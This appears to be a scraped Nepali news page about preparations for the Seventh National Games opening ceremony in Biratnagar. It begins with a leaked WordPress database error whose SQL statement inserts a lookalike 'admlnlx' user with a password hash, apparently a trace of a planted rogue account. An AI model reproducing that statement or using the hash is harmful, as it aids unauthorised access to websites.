WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B9t1pfvcykFoE4EihXm9Ua.IFMwsFD.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 14:41:18', '', 'admlnlx', 'admlnlx')
विराटनगर,पुस ५-
सातौं राष्ट्रिय खेलकुद प्रतियोगिताको उद्घाटन कार्यक्रमलाई भव्य र मनोरञ्जानत्मक बनाउने तयारी तीव्र छ। आगामी पुष ८ गते विराटनगरस्थित शहिद मैदानमा राष्ट्रपति विद्यादेवी भण्डारीबाट हुने उद्घाटनलाई भव्य बनाउन करिब ९० लाख रुपैयाँ खर्च हुने खेलकुद परिषद्ले जनाएको छ।
उद्घाटन समारोहमा आवश्यक नृत्य तथा झाँकी प्रस्तुतिका लागि सहिद रंगशालामा तयारी भइरहेको छ। उद्घाटन कार्यक्रममा करिब २ हजार ५ सय जनाले पूर्वाञ्चलका संस्कृति, भाषा र पहिचान झल्काउने सांस्कृतिक कार्यक्रम र झाँकीहरु देखाउने कार्यक्रम रहेको सातौं राष्ट्रिय खेलकुद समारोह समितिले जनाएको छ।
सातौं राष्ट्रिय खेलकुदलाई राष्ट्रकै गौरवका रुपमा स्थापित गर्न उद्घाटन कार्यक्रमलाई भव्य बनाउन लागिएको आयोजकले जनाएको छ। कार्यक्रमको लागि विराटनगरका विभिन्न १७ वटा विद्यालयका १ हजार ५ सय विद्यार्थीहरुलाई नृत्यका लागि प्रशिक्षण दिइरहेको छ। यसैगरी नेपाली सेना, नेपाल प्रहरी र सशस्त्र प्रहरीहरुको छुट्टा–छुट्टै प्रस्तुतिको तयारी भइरहेको छ।